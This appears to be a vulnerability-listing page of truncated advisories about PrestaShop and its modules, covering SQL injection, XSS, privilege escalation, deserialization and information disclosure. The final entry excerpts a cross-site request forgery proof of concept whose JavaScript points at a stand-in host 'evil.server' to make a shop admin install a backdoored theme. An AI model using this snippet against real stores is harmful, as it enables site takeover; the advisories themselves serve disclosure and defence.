CVE-2023-45387
In the module "Product Catalog CSV, Excel, XML Export PRO" exportproducts in versions up to 5.0.0 from MyPrestaModules for PrestaShop, a guest can perform SQL injection via exportProduct::addDataToDb...
CVE-2023-31671
PrestaShop postfinance = 17.1.13 is vulnerable to SQL Injection via PostfinanceValidationModuleFrontController::postProcess...
CVE-2013-6295
PrestaShop 1.5.5 vulnerable to privilege escalation via a Salesman account via upload module...
EUVD-2023-49671
Malicious code in bioql PyPI...
GHSA-8XX5-H6M3-JR33 Presta Shop vulnerable to email enumeration
Impact: An unauthenticated attacker with access to the back-office URL can manipulate the idemployee and resettoken parameters to enumerate valid back-office employee email addresses. Impacted parties: Store administrators and employees: their email addresses are exposed. Merchants: risk of...
CVE-2025-25692
A PHAR deserialization vulnerability in the getHeaders function of PrestaShop v8.2.0 allows attackers to execute arbitrary code via a crafted POST request...
CVE-2024-24303
SQL Injection vulnerability in HiPresta "Gift Wrapping Pro" hiadvancedgiftwrapping module for PrestaShop before version 1.4.1, allows remote attackers to escalate privileges and obtain sensitive information via the HiAdvancedGiftWrappingGiftWrappingModuleFrontController::addGiftWrappingCartValue...
CVE-2023-50030
In the module "Jms Setting" jmssetting from Joommasters for PrestaShop, a guest can perform SQL injection in versions = 1.1.0. The method JmsSetting::getSecondImgs has a sensitive SQL call that can be executed with a trivial http call and exploited to forge a blind SQL injection...
CVE-2023-30154
Multiple improper neutralization of SQL parameters in module AfterMail aftermailpresta for PrestaShop, before version 2.2.1, allows remote attackers to perform SQL injection attacks via idcustomer, idconf, idproduct and token parameters in aftermailajax.php via the 'idproduct' parameter in hooks...
CVE-2011-3796
PrestaShop 1.4.0.6 allows remote attackers to obtain sensitive information via a direct request to a .php file, which reveals the installation path in an error message, as demonstrated by product-sort.php and certain other files...
CVE-2024-41651
An issue in Prestashop v.8.1.7 and before allows a remote attacker to execute arbitrary code via the module upgrade functionality. NOTE: this is disputed by multiple parties, who report that exploitation requires that an attacker be able to hijack network requests made by an admin user who, by...
CVE-2024-34716 PrestaShop vulnerable to XSS via customer contact form in FO, through file upload
PrestaShop is an open source e-commerce web application. A cross-site scripting XSS vulnerability that only affects PrestaShops with customer-thread feature flag enabled is present starting from PrestaShop 8.1.0 and prior to PrestaShop 8.1.6. When the customer thread feature flag is enabled throu...
CVE-2024-25844
An issue was discovered in Common-Services "So Flexibilite" soflexibilite module for PrestaShop before version 4.1.26, allows remote attackers to escalate privileges and obtain sensitive information via debug file...
PT-2024-20346 · Prestashop · Hipresta Gift Wrapping Pro
Name of the Vulnerable Software and Affected Versions: HiPresta Gift Wrapping Pro module for PrestaShop versions prior to 1.4.1 Description: The issue allows remote attackers to escalate privileges and obtain sensitive information via the...
PrestaShop Correos Express Information Disclosure Vulnerability
PrestaShop is a set of open source e-commerce solutions from PrestaShop, USA. The program provides a variety of payment methods, SMS alerts, product image scaling and other features. Correos Express is one of the logistics management plug-ins. A security vulnerability exists in Correos...
Prestashop 1.7.6.4 - Cross-Site Request Forgery
This is totally a legit page. Just keep reading this for a minute : history.pushState'', '', '/' var target = "http://localhost"; //change this var adminurl = "/admin123ab45cd"; //change this var themeurl = "http://evil.server/backdoor-theme.zip"; //change this - link to the malicious theme zip...